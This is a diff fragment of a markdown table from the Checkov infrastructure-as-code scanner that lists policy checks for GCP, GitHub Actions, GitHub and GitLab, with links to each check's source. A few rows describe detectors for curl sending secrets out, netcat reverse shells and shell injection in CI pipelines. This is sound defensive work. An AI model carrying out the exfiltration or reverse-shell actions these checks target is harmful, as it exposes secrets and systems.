+| 2574 | CKV2_GCP_8               | resource                         | google_kms_key_ring                                                                              | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform               | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                           |
+| 2575 | CKV2_GCP_8               | resource                         | google_kms_key_ring_iam_binding                                                                  | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform               | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                           |
+| 2576 | CKV2_GCP_8               | resource                         | google_kms_key_ring_iam_member                                                                   | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform               | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                           |
+| 2577 | CKV2_GCP_9               | resource                         | google_container_registry                                                                        | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform               | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)                     |
+| 2578 | CKV2_GCP_9               | resource                         | google_storage_bucket_iam_binding                                                                | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform               | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)                     |
+| 2579 | CKV2_GCP_9               | resource                         | google_storage_bucket_iam_member                                                                 | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform               | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)                     |
+| 2580 | CKV2_GCP_10              | resource                         | google_cloudfunctions_function                                                                   | Ensure GCP Cloud Function HTTP trigger is secured                                                                                                                                                        | Terraform               | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml)                                                           |
+| 2581 | CKV2_GCP_11              | resource                         | google_project_services                                                                          | Ensure GCP GCR Container Vulnerability Scanning is enabled                                                                                                                                               | Terraform               | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml)                                       |
+| 2582 | CKV2_GCP_12              | resource                         | google_compute_firewall                                                                          | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports                                                                                                                      | Terraform               | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml)                           |
+| 2583 | CKV2_GCP_13              | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database flag 'log_duration' is set to 'on'                                                                                                                                            | Terraform               | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml)                           |
+| 2584 | CKV2_GCP_14              | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off'                                                                                                                                     | Terraform               | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml)             |
+| 2585 | CKV2_GCP_15              | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off'                                                                                                                                       | Terraform               | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml)                 |
+| 2586 | CKV2_GCP_16              | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off'                                                                                                                                      | Terraform               | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml)               |
+| 2587 | CKV2_GCP_17              | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off'                                                                                                                                    | Terraform               | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml)           |
+| 2588 | CKV2_GCP_18              | resource                         | google_compute_network                                                                           | Ensure GCP network defines a firewall and does not use the default firewall                                                                                                                              | Terraform               | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml)                                                 |
+| 2589 | CKV2_GCP_19              | resource                         | google_container_cluster                                                                         | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled                                                                                                                              | Terraform               | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml)         |
+| 2590 | CKV2_GCP_20              | resource                         | google_sql_database_instance                                                                     | Ensure MySQL DB instance has point-in-time recovery backup configured                                                                                                                                    | Terraform               | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml)           |
+| 2591 | CKV2_GCP_21              | resource                         | google_notebooks_instance                                                                        | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK)                                                                                                                          | Terraform               | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml)                                                     |
+| 2592 | CKV2_GCP_22              | resource                         | google_document_ai_processor                                                                     | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK)                                                                                                                            | Terraform               | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml)                                           |
+| 2593 | CKV2_GCP_23              | resource                         | google_document_ai_warehouse_location                                                            | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK)                                                                                                                  | Terraform               | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml)                           |
+| 2594 | CKV2_GCP_24              | resource                         | google_vertex_ai_endpoint                                                                        | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK)                                                                                                                                              | Terraform               | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml)                                                 |
+| 2595 | CKV2_GCP_25              | resource                         | google_vertex_ai_featurestore                                                                    | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK)                                                                                                                                          | Terraform               | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml)                                         |
+| 2596 | CKV2_GCP_26              | resource                         | google_vertex_ai_tensorboard                                                                     | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK)                                                                                                                                           | Terraform               | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml)                                           |
+| 2597 | CKV2_GCP_27              | resource                         | google_workbench_instance                                                                        | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK)                                                                                                                | Terraform               | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml)                                   |
+| 2598 | CKV2_GCP_28              | resource                         | google_workbench_instance                                                                        | Ensure Vertex AI workbench instances are private                                                                                                                                                         | Terraform               | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml)                                               |
+| 2599 | CKV2_GCP_29              | resource                         | google_dialogflow_agent                                                                          | Ensure logging is enabled for Dialogflow agents                                                                                                                                                          | Terraform               | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml)                                                       |
+| 2600 | CKV2_GCP_30              | resource                         | google_dialogflow_cx_agent                                                                       | Ensure logging is enabled for Dialogflow CX agents                                                                                                                                                       | Terraform               | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml)                                                   |
+| 2601 | CKV2_GCP_31              | resource                         | google_dialogflow_cx_webhook                                                                     | Ensure logging is enabled for Dialogflow CX webhooks                                                                                                                                                     | Terraform               | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml)                                               |
+| 2602 | CKV2_GCP_32              | resource                         | google_tpu_v2_vm                                                                                 | Ensure TPU v2 is private                                                                                                                                                                                 | Terraform               | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml)                                                                     |
+| 2603 | CKV2_GCP_33              | resource                         | google_vertex_ai_endpoint                                                                        | Ensure Vertex AI endpoint is private                                                                                                                                                                     | Terraform               | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml)                                                                   |
+| 2604 | CKV2_GCP_34              | resource                         | google_vertex_ai_index_endpoint                                                                  | Ensure Vertex AI index endpoint is private                                                                                                                                                               | Terraform               | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml)                                                         |
+| 2605 | CKV2_GCP_35              | resource                         | google_notebooks_runtime                                                                         | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK)                                                                                                                                  | Terraform               | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml)                                                       |
+| 2606 | CKV2_GCP_36              | resource                         | google_notebooks_runtime                                                                         | Ensure Vertex AI runtime is private                                                                                                                                                                      | Terraform               | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml)                                                                         |
+| 2607 | CKV_GHA_1                | jobs                             | jobs                                                                                             | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables                                                                                                                               | github_actions          | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py)                                                                               |
+| 2608 | CKV_GHA_1                | jobs                             | jobs.*.steps[]                                                                                   | Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables                                                                                                                               | github_actions          | [AllowUnsecureCommandsOnJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py)                                                                               |
+| 2609 | CKV_GHA_2                | jobs                             | jobs                                                                                             | Ensure run commands are not vulnerable to shell injection                                                                                                                                                | github_actions          | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py)                                                                                                       |
+| 2610 | CKV_GHA_2                | jobs                             | jobs.*.steps[]                                                                                   | Ensure run commands are not vulnerable to shell injection                                                                                                                                                | github_actions          | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ShellInjection.py)                                                                                                       |
+| 2611 | CKV_GHA_3                | jobs                             | jobs                                                                                             | Suspicious use of curl with secrets                                                                                                                                                                      | github_actions          | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py)                                                                                             |
+| 2612 | CKV_GHA_3                | jobs                             | jobs.*.steps[]                                                                                   | Suspicious use of curl with secrets                                                                                                                                                                      | github_actions          | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/SuspectCurlInScript.py)                                                                                             |
+| 2613 | CKV_GHA_4                | jobs                             | jobs                                                                                             | Suspicious use of netcat with IP address                                                                                                                                                                 | github_actions          | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py)                                                                                               |
+| 2614 | CKV_GHA_4                | jobs                             | jobs.*.steps[]                                                                                   | Suspicious use of netcat with IP address                                                                                                                                                                 | github_actions          | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/ReverseShellNetcat.py)                                                                                               |
+| 2615 | CKV_GHA_5                | jobs                             | jobs                                                                                             | Found artifact build without evidence of cosign sign execution in pipeline                                                                                                                               | github_actions          | [CosignArtifacts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignArtifacts.py)                                                                                                     |
+| 2616 | CKV_GHA_6                | jobs                             | jobs                                                                                             | Found artifact build without evidence of cosign sbom attestation in pipeline                                                                                                                             | github_actions          | [CosignSBOM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/CosignSBOM.py)                                                                                                               |
+| 2617 | CKV_GHA_7                | jobs                             | on                                                                                               | The build output cannot be affected by user parameters other than the build entry point and the top-level source location. GitHub Actions workflow_dispatch inputs MUST be empty.                        | github_actions          | [EmptyWorkflowDispatch.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py)                                                                                         |
+| 2618 | CKV2_GHA_1               | resource                         | permissions                                                                                      | Ensure top-level permissions are not set to write-all                                                                                                                                                    | github_actions          | [ReadOnlyTopLevelPermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/github_actions/checks/graph_checks/ReadOnlyTopLevelPermissions.yaml)                                                                |
+| 2619 | CKV_GIT_1                | resource                         | github_repository                                                                                | Ensure GitHub repository is Private                                                                                                                                                                      | Terraform               | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py)                                                                                                      |
+| 2620 | CKV_GIT_2                | resource                         | github_repository_webhook                                                                        | Ensure GitHub repository webhooks are using HTTPS                                                                                                                                                        | Terraform               | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py)                                                                                        |
+| 2621 | CKV_GIT_3                | resource                         | github_repository                                                                                | Ensure GitHub repository has vulnerability alerts enabled                                                                                                                                                | Terraform               | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py)                                                      |
+| 2622 | CKV_GIT_4                | resource                         | github_actions_environment_secret                                                                | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform               | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                            |
+| 2623 | CKV_GIT_4                | resource                         | github_actions_organization_secret                                                               | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform               | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                            |
+| 2624 | CKV_GIT_4                | resource                         | github_actions_secret                                                                            | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform               | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                            |
+| 2625 | CKV_GIT_5                | resource                         | github_branch_protection                                                                         | GitHub pull requests should require at least 2 approvals                                                                                                                                                 | Terraform               | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py)                                                                    |
+| 2626 | CKV_GIT_5                | resource                         | github_branch_protection_v3                                                                      | GitHub pull requests should require at least 2 approvals                                                                                                                                                 | Terraform               | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py)                                                                    |
+| 2627 | CKV_GIT_6                | resource                         | github_branch_protection                                                                         | Ensure GitHub branch protection rules requires signed commits                                                                                                                                            | Terraform               | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py)                                                    |
+| 2628 | CKV_GIT_6                | resource                         | github_branch_protection_v3                                                                      | Ensure GitHub branch protection rules requires signed commits                                                                                                                                            | Terraform               | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py)                                                    |
+| 2629 | CKV2_GIT_1               | resource                         | github_repository                                                                                | Ensure each Repository has branch protection associated                                                                                                                                                  | Terraform               | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml)                                                          |
+| 2630 | CKV_GITHUB_1             | github_configuration             | *                                                                                                | Ensure GitHub organization security settings require 2FA                                                                                                                                                 | github_configuration    | [2fa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/2fa.py)                                                                                                                                         |
+| 2631 | CKV_GITHUB_2             | github_configuration             | *                                                                                                | Ensure GitHub organization security settings require SSO                                                                                                                                                 | github_configuration    | [sso.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/sso.py)                                                                                                                                         |
+| 2632 | CKV_GITHUB_3             | github_configuration             | *                                                                                                | Ensure GitHub organization security settings has IP allow list enabled                                                                                                                                   | github_configuration    | [ipallowlist.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/ipallowlist.py)                                                                                                                         |
+| 2633 | CKV_GITHUB_4             | github_configuration             | *                                                                                                | Ensure GitHub branch protection rules requires signed commits                                                                                                                                            | github_configuration    | [require_signatures.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_signatures.py)                                                                                                           |
+| 2634 | CKV_GITHUB_5             | github_configuration             | *                                                                                                | Ensure GitHub branch protection rules does not allow force pushes                                                                                                                                        | github_configuration    | [disallow_force_pushes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_force_pushes.py)                                                                                                     |
+| 2635 | CKV_GITHUB_6             | github_configuration             | *                                                                                                | Ensure GitHub organization webhooks are using HTTPS                                                                                                                                                      | github_configuration    | [webhooks_https_orgs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_orgs.py)                                                                                                         |
+| 2636 | CKV_GITHUB_7             | github_configuration             | *                                                                                                | Ensure GitHub repository webhooks are using HTTPS                                                                                                                                                        | github_configuration    | [webhooks_https_repos.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/webhooks_https_repos.py)                                                                                                       |
+| 2637 | CKV_GITHUB_8             | github_configuration             | *                                                                                                | Ensure GitHub branch protection rules requires linear history                                                                                                                                            | github_configuration    | [require_linear_history.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_linear_history.py)                                                                                                   |
+| 2638 | CKV_GITHUB_9             | github_configuration             | *                                                                                                | Ensure 2 admins are set for each repository                                                                                                                                                              | github_configuration    | [repository_collaborators.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/repository_collaborators.py)                                                                                               |
+| 2639 | CKV_GITHUB_10            | github_configuration             | *                                                                                                | Ensure branch protection rules are enforced on administrators                                                                                                                                            | github_configuration    | [enforce_branch_protection_admins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/enforce_branch_protection_admins.py)                                                                               |
+| 2640 | CKV_GITHUB_11            | github_configuration             | *                                                                                                | Ensure GitHub branch protection dismisses stale review on new commit                                                                                                                                     | github_configuration    | [dismiss_stale_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/dismiss_stale_reviews.py)                                                                                                     |
+| 2641 | CKV_GITHUB_12            | github_configuration             | *                                                                                                | Ensure GitHub branch protection restricts who can dismiss PR reviews                                                                                                                                     | github_configuration    | [restrict_pr_review_dismissal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/restrict_pr_review_dismissal.py)                                                                                       |
+| 2642 | CKV_GITHUB_13            | github_configuration             | *                                                                                                | Ensure GitHub branch protection requires CODEOWNER reviews                                                                                                                                               | github_configuration    | [require_code_owner_reviews.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_code_owner_reviews.py)                                                                                           |
+| 2643 | CKV_GITHUB_14            | github_configuration             | *                                                                                                | Ensure all checks have passed before the merge of new code                                                                                                                                               | github_configuration    | [require_status_checks_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_status_checks_pr.py)                                                                                               |
+| 2644 | CKV_GITHUB_15            | github_configuration             | *                                                                                                | Ensure inactive branches are reviewed and removed periodically                                                                                                                                           | github_configuration    | [disallow_inactive_branch_60days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_inactive_branch_60days.py)                                                                                 |
+| 2645 | CKV_GITHUB_16            | github_configuration             | *                                                                                                | Ensure GitHub branch protection requires conversation resolution                                                                                                                                         | github_configuration    | [require_conversation_resolution.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_conversation_resolution.py)                                                                                 |
+| 2646 | CKV_GITHUB_17            | github_configuration             | *                                                                                                | Ensure GitHub branch protection requires push restrictions                                                                                                                                               | github_configuration    | [require_push_restrictions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_push_restrictions.py)                                                                                             |
+| 2647 | CKV_GITHUB_18            | github_configuration             | *                                                                                                | Ensure GitHub branch protection rules does not allow deletions                                                                                                                                           | github_configuration    | [disallow_branch_deletions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/disallow_branch_deletions.py)                                                                                             |
+| 2648 | CKV_GITHUB_19            | github_configuration             | *                                                                                                | Ensure any change to code receives approval of two strongly authenticated users                                                                                                                          | github_configuration    | [require_2approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_2approvals.py)                                                                                                           |
+| 2649 | CKV_GITHUB_20            | github_configuration             | *                                                                                                | Ensure open git branches are up to date before they can be merged into codebase                                                                                                                          | github_configuration    | [require_updated_branch_pr.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_updated_branch_pr.py)                                                                                             |
+| 2650 | CKV_GITHUB_21            | github_configuration             | *                                                                                                | Ensure public repository creation is limited to specific members                                                                                                                                         | github_configuration    | [public_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/public_repository_creation_is_limited.py)                                                                     |
+| 2651 | CKV_GITHUB_22            | github_configuration             | *                                                                                                | Ensure private repository creation is limited to specific members                                                                                                                                        | github_configuration    | [private_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/private_repository_creation_is_limited.py)                                                                   |
+| 2652 | CKV_GITHUB_23            | github_configuration             | *                                                                                                | Ensure internal repository creation is limited to specific members                                                                                                                                       | github_configuration    | [internal_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/internal_repository_creation_is_limited.py)                                                                 |
+| 2653 | CKV_GITHUB_26            | github_configuration             | *                                                                                                | Ensure minimum admins are set for the organization                                                                                                                                                       | github_configuration    | [minimum_admins_in_org.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/minimum_admins_in_org.py)                                                                                                     |
+| 2654 | CKV_GITHUB_27            | github_configuration             | *                                                                                                | Ensure strict base permissions are set for repositories                                                                                                                                                  | github_configuration    | [require_strict_base_permissions_repository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_strict_base_permissions_repository.py)                                                           |
+| 2655 | CKV_GITHUB_28            | github_configuration             | *                                                                                                | Ensure an organization's identity is confirmed with a Verified badge Passed                                                                                                                              | github_configuration    | [require_verified_organization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_verified_organization.py)                                                                                     |
+| 2656 | CKV_GITLAB_1             | gitlab_configuration             | *                                                                                                | Merge requests should require at least 2 approvals                                                                                                                                                       | gitlab_configuration    | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/merge_requests_approvals.py)                                                                                               |
+| 2657 | CKV_GITLAB_2             | gitlab_configuration             | *                                                                                                | Ensure all Gitlab groups require two factor authentication                                                                                                                                               | gitlab_configuration    | [two_factor_authentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/two_factor_authentication.py)                                                                                             |
+| 2658 | CKV_GITLABCI_1           | jobs                             | *.script[]                                                                                       | Suspicious use of curl with CI environment variables in script                                                                                                                                           | gitlab_ci               | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py)                                                                                                  |
+| 2659 | CKV_GITLABCI_2           | jobs                             | *.rules                                                                                          | Avoid creating rules that generate double pipelines                                                                                                                                                      | gitlab_ci               | [AvoidDoublePipelines.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py)                                                                                                |
+| 2660 | CKV_GITLABCI_3           | jobs                             | *.image[]                                                                                        | Detecting image usages in gitlab workflows                                                                                                                                                               | gitlab_ci               | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py)                                                                                                      |
+| 2661 | CKV_GITLABCI_3           | jobs                             | *.services[]                                                                                     | Detecting image usages in gitlab workflows                                                                                                                                                               | gitlab_ci               | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py)                                                                                                      |
+| 2662 | CKV_GLB_1                | resource                         | gitlab_project                                                                                   | Ensure at least two approving reviews are required to merge a GitLab MR                                                                                                                                  | Terraform               | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py)                                                                        |
+| 2663 | CKV_GLB_2                | resource                         | gitlab_branch_protection                                                                         | Ensure GitLab branch protection rules does not allow force pushes                                                                                                                                        | Terraform               | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py)                                                                                          |
+| 2664 | CKV_GLB_3                | resource                         | gitlab_project                                                                                   | Ensure GitLab prevent secrets is enabled                                                                                                                                                                 | Terraform               | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py)                                                                                  |
+| 2665 | CKV_GLB_4                | resource                         | gitlab_project                                                                                   | Ensure GitLab commits are signed                                                                                                                                                                         | Terraform               | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py)                                                                                  |
